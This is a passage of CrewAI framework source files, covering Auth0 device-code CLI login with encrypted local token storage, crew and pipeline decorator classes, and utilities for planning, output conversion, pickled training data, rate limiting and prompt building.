move along." File: src/crewai/cli/authentication/constants.py ALGORITHMS = ["RS256"] AUTH0_DOMAIN = "crewai.us.auth0.com" AUTH0_CLIENT_ID = "DEVC5Fw6NlRoSzmDCcOhVq85EfLBjKa8" AUTH0_AUDIENCE = "https://crewai.us.auth0.com/api/v2/" File: src/crewai/cli/authentication/__init__.py from .main import AuthenticationCommand __all__ = ["AuthenticationCommand"] File: src/crewai/cli/authentication/utils.py import json import os import sys from datetime import datetime, timedelta from pathlib import Path from typing import Optional from auth0.authentication.token_verifier import ( AsymmetricSignatureVerifier, TokenVerifier, ) from cryptography.fernet import Fernet from .constants import AUTH0_CLIENT_ID, AUTH0_DOMAIN def validate_token(id_token: str) -> None: """ Verify the token and its precedence :param id_token: """ jwks_url = f"https://{AUTH0_DOMAIN}/.well-known/jwks.json" issuer = f"https://{AUTH0_DOMAIN}/" signature_verifier = AsymmetricSignatureVerifier(jwks_url) token_verifier = TokenVerifier( signature_verifier=signature_verifier, issuer=issuer, audience=AUTH0_CLIENT_ID ) token_verifier.verify(id_token) class TokenManager: def __init__(self, file_path: str = "tokens.enc") -> None: """ Initialize the TokenManager class. :param file_path: The file path to store the encrypted tokens. Default is "tokens.enc". 
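
        Illustrative usage (the token value is a placeholder):
            manager = TokenManager()
            manager.save_tokens("<access token>", expires_in=3600)
            token = manager.get_token()  # None once the stored token has expired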
""" self.file_path = file_path self.key = self._get_or_create_key() self.fernet = Fernet(self.key) def _get_or_create_key(self) -> bytes: """ Get or create the encryption key. :return: The encryption key. """ key_filename = "secret.key" key = self.read_secure_file(key_filename) if key is not None: return key new_key = Fernet.generate_key() self.save_secure_file(key_filename, new_key) return new_key def save_tokens(self, access_token: str, expires_in: int) -> None: """ Save the access token and its expiration time. :param access_token: The access token to save. :param expires_in: The expiration time of the access token in seconds. """ expiration_time = datetime.now() + timedelta(seconds=expires_in) data = { "access_token": access_token, "expiration": expiration_time.isoformat(), } encrypted_data = self.fernet.encrypt(json.dumps(data).encode()) self.save_secure_file(self.file_path, encrypted_data) def get_token(self) -> Optional[str]: """ Get the access token if it is valid and not expired. :return: The access token if valid and not expired, otherwise None. """ encrypted_data = self.read_secure_file(self.file_path) decrypted_data = self.fernet.decrypt(encrypted_data) data = json.loads(decrypted_data) expiration = datetime.fromisoformat(data["expiration"]) if expiration <= datetime.now(): return None return data["access_token"] def get_secure_storage_path(self) -> Path: """ Get the secure storage path based on the operating system. :return: The secure storage path. """ if sys.platform == "win32": # Windows: Use %LOCALAPPDATA% base_path = os.environ.get("LOCALAPPDATA") elif sys.platform == "darwin": # macOS: Use ~/Library/Application Support base_path = os.path.expanduser("~/Library/Application Support") else: # Linux and other Unix-like: Use ~/.local/share base_path = os.path.expanduser("~/.local/share") app_name = "crewai/credentials" storage_path = Path(base_path) / app_name storage_path.mkdir(parents=True, exist_ok=True) return storage_path def save_secure_file(self, filename: str, content: bytes) -> None: """ Save the content to a secure file. :param filename: The name of the file. :param content: The content to save. """ storage_path = self.get_secure_storage_path() file_path = storage_path / filename with open(file_path, "wb") as f: f.write(content) # Set appropriate permissions (read/write for owner only) os.chmod(file_path, 0o600) def read_secure_file(self, filename: str) -> Optional[bytes]: """ Read the content of a secure file. :param filename: The name of the file. :return: The content of the file if it exists, otherwise None. 
""" storage_path = self.get_secure_storage_path() file_path = storage_path / filename if not file_path.exists(): return None with open(file_path, "rb") as f: return f.read() File: src/crewai/cli/authentication/main.py import time import webbrowser from typing import Any, Dict import requests from rich.console import Console from .constants import AUTH0_AUDIENCE, AUTH0_CLIENT_ID, AUTH0_DOMAIN from .utils import TokenManager, validate_token console = Console() class AuthenticationCommand: DEVICE_CODE_URL = f"https://{AUTH0_DOMAIN}/oauth/device/code" TOKEN_URL = f"https://{AUTH0_DOMAIN}/oauth/token" def __init__(self): self.token_manager = TokenManager() def signup(self) -> None: """Sign up to CrewAI+""" console.print("Signing Up to CrewAI+ \n", style="bold blue") device_code_data = self._get_device_code() self._display_auth_instructions(device_code_data) return self._poll_for_token(device_code_data) def _get_device_code(self) -> Dict[str, Any]: """Get the device code to authenticate the user.""" device_code_payload = { "client_id": AUTH0_CLIENT_ID, "scope": "openid", "audience": AUTH0_AUDIENCE, } response = requests.post(url=self.DEVICE_CODE_URL, data=device_code_payload) response.raise_for_status() return response.json() def _display_auth_instructions(self, device_code_data: Dict[str, str]) -> None: """Display the authentication instructions to the user.""" console.print("1. Navigate to: ", device_code_data["verification_uri_complete"]) console.print("2. Enter the following code: ", device_code_data["user_code"]) webbrowser.open(device_code_data["verification_uri_complete"]) def _poll_for_token(self, device_code_data: Dict[str, Any]) -> None: """Poll the server for the token.""" token_payload = { "grant_type": "urn:ietf:params:oauth:grant-type:device_code", "device_code": device_code_data["device_code"], "client_id": AUTH0_CLIENT_ID, } attempts = 0 while True and attempts < 5: response = requests.post(self.TOKEN_URL, data=token_payload) token_data = response.json() if response.status_code == 200: validate_token(token_data["id_token"]) expires_in = 360000 # Token expiration time in seconds self.token_manager.save_tokens(token_data["access_token"], expires_in) console.print("\nWelcome to CrewAI+ !!", style="green") return if token_data["error"] not in ("authorization_pending", "slow_down"): raise requests.HTTPError(token_data["error_description"]) time.sleep(device_code_data["interval"]) attempts += 1 console.print( "Timeout: Failed to get the token. 
Please try again.", style="bold red" ) File: src/crewai/project/crew_base.py import inspect from pathlib import Path from typing import Any, Callable, Dict import yaml from dotenv import load_dotenv load_dotenv() def CrewBase(cls): class WrappedClass(cls): is_crew_class: bool = True # type: ignore # Get the directory of the class being decorated base_directory = Path(inspect.getfile(cls)).parent original_agents_config_path = getattr( cls, "agents_config", "config/agents.yaml" ) original_tasks_config_path = getattr(cls, "tasks_config", "config/tasks.yaml") def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) agents_config_path = self.base_directory / self.original_agents_config_path tasks_config_path = self.base_directory / self.original_tasks_config_path self.agents_config = self.load_yaml(agents_config_path) self.tasks_config = self.load_yaml(tasks_config_path) self.map_all_agent_variables() self.map_all_task_variables() @staticmethod def load_yaml(config_path: Path): try: with open(config_path, "r") as file: return yaml.safe_load(file) except FileNotFoundError: print(f"File not found: {config_path}") raise def _get_all_functions(self): return { name: getattr(self, name) for name in dir(self) if callable(getattr(self, name)) } def _filter_functions( self, functions: Dict[str, Callable], attribute: str ) -> Dict[str, Callable]: return { name: func for name, func in functions.items() if hasattr(func, attribute) } def map_all_agent_variables(self) -> None: all_functions = self._get_all_functions() llms = self._filter_functions(all_functions, "is_llm") tool_functions = self._filter_functions(all_functions, "is_tool") cache_handler_functions = self._filter_functions( all_functions, "is_cache_handler" ) callbacks = self._filter_functions(all_functions, "is_callback") agents = self._filter_functions(all_functions, "is_agent") for agent_name, agent_info in self.agents_config.items(): self._map_agent_variables( agent_name, agent_info, agents, llms, tool_functions, cache_handler_functions, callbacks, ) def _map_agent_variables( self, agent_name: str, agent_info: Dict[str, Any], agents: Dict[str, Callable], llms: Dict[str, Callable], tool_functions: Dict[str, Callable], cache_handler_functions: Dict[str, Callable], callbacks: Dict[str, Callable], ) -> None: if llm := agent_info.get("llm"): self.agents_config[agent_name]["llm"] = llms[llm]() if tools := agent_info.get("tools"): self.agents_config[agent_name]["tools"] = [ tool_functions[tool]() for tool in tools ] if function_calling_llm := agent_info.get("function_calling_llm"): self.agents_config[agent_name]["function_calling_llm"] = agents[ function_calling_llm ]() if step_callback := agent_info.get("step_callback"): self.agents_config[agent_name]["step_callback"] = callbacks[ step_callback ]() if cache_handler := agent_info.get("cache_handler"): self.agents_config[agent_name]["cache_handler"] = ( cache_handler_functions[cache_handler]() ) def map_all_task_variables(self) -> None: all_functions = self._get_all_functions() agents = self._filter_functions(all_functions, "is_agent") tasks = self._filter_functions(all_functions, "is_task") output_json_functions = self._filter_functions( all_functions, "is_output_json" ) tool_functions = self._filter_functions(all_functions, "is_tool") callback_functions = self._filter_functions(all_functions, "is_callback") output_pydantic_functions = self._filter_functions( all_functions, "is_output_pydantic" ) for task_name, task_info in self.tasks_config.items(): self._map_task_variables( 
task_name, task_info, agents, tasks, output_json_functions, tool_functions, callback_functions, output_pydantic_functions, ) def _map_task_variables( self, task_name: str, task_info: Dict[str, Any], agents: Dict[str, Callable], tasks: Dict[str, Callable], output_json_functions: Dict[str, Callable], tool_functions: Dict[str, Callable], callback_functions: Dict[str, Callable], output_pydantic_functions: Dict[str, Callable], ) -> None: if context_list := task_info.get("context"): self.tasks_config[task_name]["context"] = [ tasks[context_task_name]() for context_task_name in context_list ] if tools := task_info.get("tools"): self.tasks_config[task_name]["tools"] = [ tool_functions[tool]() for tool in tools ] if agent_name := task_info.get("agent"): self.tasks_config[task_name]["agent"] = agents[agent_name]() if output_json := task_info.get("output_json"): self.tasks_config[task_name]["output_json"] = output_json_functions[ output_json ] if output_pydantic := task_info.get("output_pydantic"): self.tasks_config[task_name]["output_pydantic"] = ( output_pydantic_functions[output_pydantic] ) if callbacks := task_info.get("callbacks"): self.tasks_config[task_name]["callbacks"] = [ callback_functions[callback]() for callback in callbacks ] return WrappedClass File: src/crewai/project/__init__.py from .annotations import ( agent, cache_handler, callback, crew, llm, output_json, output_pydantic, pipeline, task, tool, ) from .crew_base import CrewBase from .pipeline_base import PipelineBase __all__ = [ "agent", "crew", "task", "output_json", "output_pydantic", "tool", "callback", "CrewBase", "PipelineBase", "llm", "cache_handler", "pipeline", ] File: src/crewai/project/utils.py def memoize(func): cache = {} def memoized_func(*args, **kwargs): key = (args, tuple(kwargs.items())) if key not in cache: cache[key] = func(*args, **kwargs) return cache[key] memoized_func.__dict__.update(func.__dict__) return memoized_func File: src/crewai/project/pipeline_base.py from typing import Any, Callable, Dict, List, Type, Union from crewai.crew import Crew from crewai.pipeline.pipeline import Pipeline from crewai.routers.router import Router PipelineStage = Union[Crew, List[Crew], Router] # TODO: Could potentially remove. 
Need to check with @joao and @gui if this is needed for CrewAI+ def PipelineBase(cls: Type[Any]) -> Type[Any]: class WrappedClass(cls): is_pipeline_class: bool = True # type: ignore stages: List[PipelineStage] def __init__(self, *args: Any, **kwargs: Any) -> None: super().__init__(*args, **kwargs) self.stages = [] self._map_pipeline_components() def _get_all_functions(self) -> Dict[str, Callable[..., Any]]: return { name: getattr(self, name) for name in dir(self) if callable(getattr(self, name)) } def _filter_functions( self, functions: Dict[str, Callable[..., Any]], attribute: str ) -> Dict[str, Callable[..., Any]]: return { name: func for name, func in functions.items() if hasattr(func, attribute) } def _map_pipeline_components(self) -> None: all_functions = self._get_all_functions() crew_functions = self._filter_functions(all_functions, "is_crew") router_functions = self._filter_functions(all_functions, "is_router") for stage_attr in dir(self): stage = getattr(self, stage_attr) if isinstance(stage, (Crew, Router)): self.stages.append(stage) elif callable(stage) and hasattr(stage, "is_crew"): self.stages.append(crew_functions[stage_attr]()) elif callable(stage) and hasattr(stage, "is_router"): self.stages.append(router_functions[stage_attr]()) elif isinstance(stage, list) and all( isinstance(item, Crew) for item in stage ): self.stages.append(stage) def build_pipeline(self) -> Pipeline: return Pipeline(stages=self.stages) return WrappedClass File: src/crewai/project/annotations.py from functools import wraps from crewai.project.utils import memoize def task(func): if not hasattr(task, "registration_order"): task.registration_order = [] @wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) if not result.name: result.name = func.__name__ return result setattr(wrapper, "is_task", True) task.registration_order.append(func.__name__) return memoize(wrapper) def agent(func): func.is_agent = True func = memoize(func) return func def llm(func): func.is_llm = True func = memoize(func) return func def output_json(cls): cls.is_output_json = True return cls def output_pydantic(cls): cls.is_output_pydantic = True return cls def tool(func): func.is_tool = True return memoize(func) def callback(func): func.is_callback = True return memoize(func) def cache_handler(func): func.is_cache_handler = True return memoize(func) def stage(func): func.is_stage = True return memoize(func) def router(func): func.is_router = True return memoize(func) def pipeline(func): func.is_pipeline = True return memoize(func) def crew(func): def wrapper(self, *args, **kwargs): instantiated_tasks = [] instantiated_agents = [] agent_roles = set() all_functions = { name: getattr(self, name) for name in dir(self) if callable(getattr(self, name)) } tasks = { name: func for name, func in all_functions.items() if hasattr(func, "is_task") } agents = { name: func for name, func in all_functions.items() if hasattr(func, "is_agent") } # Sort tasks by their registration order sorted_task_names = sorted( tasks, key=lambda name: task.registration_order.index(name) ) # Instantiate tasks in the order they were defined for task_name in sorted_task_names: task_instance = tasks[task_name]() instantiated_tasks.append(task_instance) agent_instance = getattr(task_instance, "agent", None) if agent_instance is not None: agent_instance = task_instance.agent if agent_instance.role not in agent_roles: instantiated_agents.append(agent_instance) agent_roles.add(agent_instance.role) # Instantiate any additional agents not already included 
by tasks for agent_name in agents: temp_agent_instance = agents[agent_name]() if temp_agent_instance.role not in agent_roles: instantiated_agents.append(temp_agent_instance) agent_roles.add(temp_agent_instance.role) self.agents = instantiated_agents self.tasks = instantiated_tasks return func(self, *args, **kwargs) return wrapper File: src/crewai/utilities/planning_handler.py from typing import Any, List, Optional from langchain_openai import ChatOpenAI from pydantic import BaseModel, Field from crewai.agent import Agent from crewai.task import Task class PlanPerTask(BaseModel): task: str = Field(..., description="The task for which the plan is created") plan: str = Field( ..., description="The step by step plan on how the agents can execute their tasks using the available tools with mastery", ) class PlannerTaskPydanticOutput(BaseModel): list_of_plans_per_task: List[PlanPerTask] = Field( ..., description="Step by step plan on how the agents can execute their tasks using the available tools with mastery", ) class CrewPlanner: def __init__(self, tasks: List[Task], planning_agent_llm: Optional[Any] = None): self.tasks = tasks if planning_agent_llm is None: self.planning_agent_llm = ChatOpenAI(model="gpt-4o-mini") else: self.planning_agent_llm = planning_agent_llm def _handle_crew_planning(self) -> PlannerTaskPydanticOutput: """Handles the Crew planning by creating detailed step-by-step plans for each task.""" planning_agent = self._create_planning_agent() tasks_summary = self._create_tasks_summary() planner_task = self._create_planner_task(planning_agent, tasks_summary) result = planner_task.execute_sync() if isinstance(result.pydantic, PlannerTaskPydanticOutput): return result.pydantic raise ValueError("Failed to get the Planning output") def _create_planning_agent(self) -> Agent: """Creates the planning agent for the crew planning.""" return Agent( role="Task Execution Planner", goal=( "Your goal is to create an extremely detailed, step-by-step plan based on the tasks and tools " "available to each agent so that they can perform the tasks in an exemplary manner" ), backstory="Planner agent for crew planning", llm=self.planning_agent_llm, ) def _create_planner_task(self, planning_agent: Agent, tasks_summary: str) -> Task: """Creates the planner task using the given agent and tasks summary.""" return Task( description=( f"Based on these tasks summary: {tasks_summary} \n Create the most descriptive plan based on the tasks " "descriptions, tools available, and agents' goals for them to execute their goals with perfection." 
            ),
            expected_output="Step by step plan on how the agents can execute their tasks using the available tools with mastery",
            agent=planning_agent,
            output_pydantic=PlannerTaskPydanticOutput,
        )

    def _create_tasks_summary(self) -> str:
        """Creates a summary of all tasks."""
        tasks_summary = []
        for idx, task in enumerate(self.tasks):
            tasks_summary.append(
                f"""
                Task Number {idx + 1} - {task.description}
                "task_description": {task.description}
                "task_expected_output": {task.expected_output}
                "agent": {task.agent.role if task.agent else "None"}
                "agent_goal": {task.agent.goal if task.agent else "None"}
                "task_tools": {task.tools}
                "agent_tools": {task.agent.tools if task.agent else "None"}
                """
            )
        return " ".join(tasks_summary)

File: src/crewai/utilities/formatter.py

from typing import List

from crewai.task import Task
from crewai.tasks.task_output import TaskOutput


def aggregate_raw_outputs_from_task_outputs(task_outputs: List[TaskOutput]) -> str:
    """Generate string context from the task outputs."""
    dividers = "\n\n----------\n\n"

    # Join task outputs with dividers
    context = dividers.join(output.raw for output in task_outputs)
    return context


def aggregate_raw_outputs_from_tasks(tasks: List[Task]) -> str:
    """Generate string context from the tasks."""
    task_outputs = [task.output for task in tasks if task.output is not None]

    return aggregate_raw_outputs_from_task_outputs(task_outputs)

File: src/crewai/utilities/file_handler.py

import os
import pickle
from datetime import datetime


class FileHandler:
    """Takes care of file operations; currently it only logs messages to a file."""

    def __init__(self, file_path):
        if isinstance(file_path, bool):
            self._path = os.path.join(os.curdir, "logs.txt")
        elif isinstance(file_path, str):
            self._path = file_path
        else:
            raise ValueError("file_path must be either a boolean or a string.")

    def log(self, **kwargs):
        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # Timestamp prefix followed by comma-separated key=value pairs
        message = f"{now}: " + ", ".join(f"{key}={value}" for key, value in kwargs.items())
        with open(self._path, "a", encoding="utf-8") as file:
            file.write(message + "\n")


class PickleHandler:
    def __init__(self, file_name: str) -> None:
        """
        Initialize the PickleHandler with the name of the file where data will be stored.
        The file will be saved in the current directory.

        Parameters:
        - file_name (str): The name of the file for saving and loading data.
        """
        if not file_name.endswith(".pkl"):
            file_name += ".pkl"

        self.file_path = os.path.join(os.getcwd(), file_name)

    def initialize_file(self) -> None:
        """
        Initialize the file with an empty dictionary and overwrite any existing data.
        """
        self.save({})

    def save(self, data) -> None:
        """
        Save the data to the specified file using pickle.

        Parameters:
        - data (object): The data to be saved.
        """
        with open(self.file_path, "wb") as file:
            pickle.dump(data, file)

    def load(self) -> dict:
        """
        Load the data from the specified file using pickle.

        Returns:
        - dict: The data loaded from the file.
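          An empty dictionary is returned if the file is missing, empty, or truncated.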
""" if not os.path.exists(self.file_path) or os.path.getsize(self.file_path) == 0: return {} # Return an empty dictionary if the file does not exist or is empty with open(self.file_path, "rb") as file: try: return pickle.load(file) except EOFError: return {} # Return an empty dictionary if the file is empty or corrupted except Exception: raise # Raise any other exceptions that occur during loading File: src/crewai/utilities/config.py from typing import Any, Dict, Type from pydantic import BaseModel def process_config( values: Dict[str, Any], model_class: Type[BaseModel] ) -> Dict[str, Any]: """ Process the config dictionary and update the values accordingly. Args: values (Dict[str, Any]): The dictionary of values to update. model_class (Type[BaseModel]): The Pydantic model class to reference for field validation. Returns: Dict[str, Any]: The updated values dictionary. """ config = values.get("config", {}) if not config: return values # Copy values from config (originally from YAML) to the model's attributes. # Only copy if the attribute isn't already set, preserving any explicitly defined values. for key, value in config.items(): if key not in model_class.model_fields or values.get(key) is not None: continue if isinstance(value, dict): if isinstance(values.get(key), dict): values[key].update(value) else: values[key] = value else: values[key] = value # Remove the config from values to avoid duplicate processing values.pop("config", None) return values File: src/crewai/utilities/rpm_controller.py import threading import time from typing import Optional from pydantic import BaseModel, Field, PrivateAttr, model_validator from crewai.utilities.logger import Logger class RPMController(BaseModel): max_rpm: Optional[int] = Field(default=None) logger: Logger = Field(default_factory=lambda: Logger(verbose=False)) _current_rpm: int = PrivateAttr(default=0) _timer: Optional[threading.Timer] = PrivateAttr(default=None) _lock: Optional[threading.Lock] = PrivateAttr(default=None) _shutdown_flag: bool = PrivateAttr(default=False) @model_validator(mode="after") def reset_counter(self): if self.max_rpm is not None: if not self._shutdown_flag: self._lock = threading.Lock() self._reset_request_count() return self def check_or_wait(self): if self.max_rpm is None: return True def _check_and_increment(): if self.max_rpm is not None and self._current_rpm < self.max_rpm: self._current_rpm += 1 return True elif self.max_rpm is not None: self.logger.log( "info", "Max RPM reached, waiting for next minute to start." 
) self._wait_for_next_minute() self._current_rpm = 1 return True return True if self._lock: with self._lock: return _check_and_increment() else: return _check_and_increment() def stop_rpm_counter(self): if self._timer: self._timer.cancel() self._timer = None def _wait_for_next_minute(self): time.sleep(60) self._current_rpm = 0 def _reset_request_count(self): def _reset(): self._current_rpm = 0 if not self._shutdown_flag: self._timer = threading.Timer(60.0, self._reset_request_count) self._timer.start() if self._lock: with self._lock: _reset() else: _reset() if self._timer: self._shutdown_flag = True self._timer.cancel() File: src/crewai/utilities/paths.py import os from pathlib import Path import appdirs def db_storage_path(): app_name = get_project_directory_name() app_author = "CrewAI" data_dir = Path(appdirs.user_data_dir(app_name, app_author)) data_dir.mkdir(parents=True, exist_ok=True) return data_dir def get_project_directory_name(): project_directory_name = os.environ.get("CREWAI_STORAGE_DIR") if project_directory_name: return project_directory_name else: cwd = Path.cwd() project_directory_name = cwd.name return project_directory_name File: src/crewai/utilities/pydantic_schema_parser.py from typing import Type, get_args, get_origin from pydantic import BaseModel class PydanticSchemaParser(BaseModel): model: Type[BaseModel] def get_schema(self) -> str: """ Public method to get the schema of a Pydantic model. :param model: The Pydantic model class to generate schema for. :return: String representation of the model schema. """ return self._get_model_schema(self.model) def _get_model_schema(self, model, depth=0) -> str: indent = " " * depth lines = [f"{indent}{{"] for field_name, field in model.model_fields.items(): field_type_str = self._get_field_type(field, depth + 1) lines.append(f"{indent} {field_name}: {field_type_str},") lines[-1] = lines[-1].rstrip(",") # Remove trailing comma from last item lines.append(f"{indent}}}") return "\n".join(lines) def _get_field_type(self, field, depth) -> str: field_type = field.annotation if get_origin(field_type) is list: list_item_type = get_args(field_type)[0] if isinstance(list_item_type, type) and issubclass( list_item_type, BaseModel ): nested_schema = self._get_model_schema(list_item_type, depth + 1) return f"List[\n{nested_schema}\n{' ' * 4 * depth}]" else: return f"List[{list_item_type.__name__}]" elif issubclass(field_type, BaseModel): return self._get_model_schema(field_type, depth) else: return field_type.__name__ File: src/crewai/utilities/constants.py TRAINING_DATA_FILE = "training_data.pkl" TRAINED_AGENTS_DATA_FILE = "trained_agents_data.pkl" File: src/crewai/utilities/converter.py import json import re from typing import Any, Optional, Type, Union from langchain.schema import HumanMessage, SystemMessage from langchain_openai import ChatOpenAI from pydantic import BaseModel, ValidationError from crewai.agents.agent_builder.utilities.base_output_converter import OutputConverter from crewai.utilities.printer import Printer from crewai.utilities.pydantic_schema_parser import PydanticSchemaParser class ConverterError(Exception): """Error raised when Converter fails to parse the input.""" def __init__(self, message: str, *args: object) -> None: super().__init__(message, *args) self.message = message class Converter(OutputConverter): """Class that converts text into either pydantic or json.""" def to_pydantic(self, current_attempt=1): """Convert text to pydantic.""" try: if self.is_gpt: return self._create_instructor().to_pydantic() else: 
return self._create_chain().invoke({}) except Exception as e: if current_attempt < self.max_attempts: return self.to_pydantic(current_attempt + 1) return ConverterError( f"Failed to convert text into a pydantic model due to the following error: {e}" ) def to_json(self, current_attempt=1): """Convert text to json.""" try: if self.is_gpt: return self._create_instructor().to_json() else: return json.dumps(self._create_chain().invoke({}).model_dump()) except Exception as e: if current_attempt < self.max_attempts: return self.to_json(current_attempt + 1) return ConverterError(f"Failed to convert text into JSON, error: {e}.") def _create_instructor(self): """Create an instructor.""" from crewai.utilities import Instructor inst = Instructor( llm=self.llm, max_attempts=self.max_attempts, model=self.model, content=self.text, instructions=self.instructions, ) return inst def _create_chain(self): """Create a chain.""" from crewai.utilities.crew_pydantic_output_parser import ( CrewPydanticOutputParser, ) parser = CrewPydanticOutputParser(pydantic_object=self.model) new_prompt = SystemMessage(content=self.instructions) + HumanMessage( content=self.text ) return new_prompt | self.llm | parser @property def is_gpt(self) -> bool: """Return if llm provided is of gpt from openai.""" return isinstance(self.llm, ChatOpenAI) and self.llm.openai_api_base is None def convert_to_model( result: str, output_pydantic: Optional[Type[BaseModel]], output_json: Optional[Type[BaseModel]], agent: Any, converter_cls: Optional[Type[Converter]] = None, ) -> Union[dict, BaseModel, str]: model = output_pydantic or output_json if model is None: return result try: escaped_result = json.dumps(json.loads(result, strict=False)) return validate_model(escaped_result, model, bool(output_json)) except json.JSONDecodeError as e: Printer().print( content=f"Error parsing JSON: {e}. Attempting to handle partial JSON.", color="yellow", ) return handle_partial_json( result, model, bool(output_json), agent, converter_cls ) except ValidationError as e: Printer().print( content=f"Pydantic validation error: {e}. Attempting to handle partial JSON.", color="yellow", ) return handle_partial_json( result, model, bool(output_json), agent, converter_cls ) except Exception as e: Printer().print( content=f"Unexpected error during model conversion: {type(e).__name__}: {e}. Returning original result.", color="red", ) return result def validate_model( result: str, model: Type[BaseModel], is_json_output: bool ) -> Union[dict, BaseModel]: exported_result = model.model_validate_json(result) if is_json_output: return exported_result.model_dump() return exported_result def handle_partial_json( result: str, model: Type[BaseModel], is_json_output: bool, agent: Any, converter_cls: Optional[Type[Converter]] = None, ) -> Union[dict, BaseModel, str]: match = re.search(r"({.*})", result, re.DOTALL) if match: try: exported_result = model.model_validate_json(match.group(0)) if is_json_output: return exported_result.model_dump() return exported_result except json.JSONDecodeError as e: Printer().print( content=f"Error parsing JSON: {e}. The extracted JSON-like string is not valid JSON. Attempting alternative conversion method.", color="yellow", ) except ValidationError as e: Printer().print( content=f"Pydantic validation error: {e}. The JSON structure doesn't match the expected model. Attempting alternative conversion method.", color="yellow", ) except Exception as e: Printer().print( content=f"Unexpected error during partial JSON handling: {type(e).__name__}: {e}. 
Attempting alternative conversion method.", color="red", ) return convert_with_instructions( result, model, is_json_output, agent, converter_cls ) def convert_with_instructions( result: str, model: Type[BaseModel], is_json_output: bool, agent: Any, converter_cls: Optional[Type[Converter]] = None, ) -> Union[dict, BaseModel, str]: llm = agent.function_calling_llm or agent.llm instructions = get_conversion_instructions(model, llm) converter = create_converter( agent=agent, converter_cls=converter_cls, llm=llm, text=result, model=model, instructions=instructions, ) exported_result = ( converter.to_pydantic() if not is_json_output else converter.to_json() ) if isinstance(exported_result, ConverterError): Printer().print( content=f"{exported_result.message} Using raw output instead.", color="red", ) return result return exported_result def get_conversion_instructions(model: Type[BaseModel], llm: Any) -> str: instructions = "I'm gonna convert this raw text into valid JSON." if not is_gpt(llm): model_schema = PydanticSchemaParser(model=model).get_schema() instructions = f"{instructions}\n\nThe json should have the following structure, with the following keys:\n{model_schema}" return instructions def is_gpt(llm: Any) -> bool: from langchain_openai import ChatOpenAI return isinstance(llm, ChatOpenAI) and llm.openai_api_base is None def create_converter( agent: Optional[Any] = None, converter_cls: Optional[Type[Converter]] = None, *args, **kwargs, ) -> Converter: if agent and not converter_cls: if hasattr(agent, "get_output_converter"): converter = agent.get_output_converter(*args, **kwargs) else: raise AttributeError("Agent does not have a 'get_output_converter' method") elif converter_cls: converter = converter_cls(*args, **kwargs) else: raise ValueError("Either agent or converter_cls must be provided") if not converter: raise Exception("No output converter found or set.") return converter File: src/crewai/utilities/__init__.py from .converter import Converter, ConverterError from .file_handler import FileHandler from .i18n import I18N from .instructor import Instructor from .logger import Logger from .parser import YamlParser from .printer import Printer from .prompts import Prompts from .rpm_controller import RPMController from .exceptions.context_window_exceeding_exception import ( LLMContextLengthExceededException, ) __all__ = [ "Converter", "ConverterError", "FileHandler", "I18N", "Instructor", "Logger", "Printer", "Prompts", "RPMController", "YamlParser", "LLMContextLengthExceededException", ] File: src/crewai/utilities/instructor.py from typing import Any, Optional, Type import instructor from pydantic import BaseModel, Field, PrivateAttr, model_validator class Instructor(BaseModel): """Class that wraps an agent llm with instructor.""" _client: Any = PrivateAttr() content: str = Field(description="Content to be sent to the instructor.") agent: Optional[Any] = Field( description="The agent that needs to use instructor.", default=None ) llm: Optional[Any] = Field( description="The agent that needs to use instructor.", default=None ) instructions: Optional[str] = Field( description="Instructions to be sent to the instructor.", default=None, ) model: Type[BaseModel] = Field( description="Pydantic model to be used to create an output." 
) @model_validator(mode="after") def set_instructor(self): """Set instructor.""" if self.agent and not self.llm: self.llm = self.agent.function_calling_llm or self.agent.llm self._client = instructor.patch( self.llm.client._client, mode=instructor.Mode.TOOLS, ) return self def to_json(self): model = self.to_pydantic() return model.model_dump_json(indent=2) def to_pydantic(self): messages = [{"role": "user", "content": self.content}] if self.instructions: messages.append({"role": "system", "content": self.instructions}) model = self._client.chat.completions.create( model=self.llm.model_name, response_model=self.model, messages=messages ) return model File: src/crewai/utilities/logger.py from datetime import datetime from pydantic import BaseModel, Field, PrivateAttr from crewai.utilities.printer import Printer class Logger(BaseModel): verbose: bool = Field(default=False) _printer: Printer = PrivateAttr(default_factory=Printer) def log(self, level, message, color="bold_green"): if self.verbose: timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") self._printer.print( f"[{timestamp}][{level.upper()}]: {message}", color=color ) File: src/crewai/utilities/training_handler.py from crewai.utilities.file_handler import PickleHandler class CrewTrainingHandler(PickleHandler): def save_trained_data(self, agent_id: str, trained_data: dict) -> None: """ Save the trained data for a specific agent. Parameters: - agent_id (str): The ID of the agent. - trained_data (dict): The trained data to be saved. """ data = self.load() data[agent_id] = trained_data self.save(data) def append(self, train_iteration: int, agent_id: str, new_data) -> None: """ Append new data to the existing pickle file. Parameters: - new_data (object): The new data to be appended. """ data = self.load() if agent_id in data: data[agent_id][train_iteration] = new_data else: data[agent_id] = {train_iteration: new_data} self.save(data) File: src/crewai/utilities/prompts.py from typing import Any, ClassVar, Optional from langchain.prompts import BasePromptTemplate, PromptTemplate from pydantic import BaseModel, Field from crewai.utilities import I18N class Prompts(BaseModel): """Manages and generates prompts for a generic agent.""" i18n: I18N = Field(default=I18N()) tools: list[Any] = Field(default=[]) system_template: Optional[str] = None prompt_template: Optional[str] = None response_template: Optional[str] = None SCRATCHPAD_SLICE: ClassVar[str] = "\n{agent_scratchpad}" def task_execution(self) -> BasePromptTemplate: """Generate a standard prompt for task execution.""" slices = ["role_playing"] if len(self.tools) > 0: slices.append("tools") else: slices.append("no_tools") slices.append("task") if not self.system_template and not self.prompt_template: return self._build_prompt(slices) else: return self._build_prompt( slices, self.system_template, self.prompt_template, self.response_template, ) def _build_prompt( self, components: list[str], system_template=None, prompt_template=None, response_template=None, ) -> BasePromptTemplate: """Constructs a prompt string from specified components.""" if not system_template and not prompt_template: prompt_parts = [self.i18n.slice(component) for component in components] prompt_parts.append(self.SCRATCHPAD_SLICE) prompt = PromptTemplate.from_template("".join(prompt_parts)) else: prompt_parts = [ self.i18n.slice(component) for component in components if component != "task" ] system = system_template.replace("{{ .System }}", "".join(prompt_parts)) prompt = prompt_template.replace( "{{ .Prompt }}", 
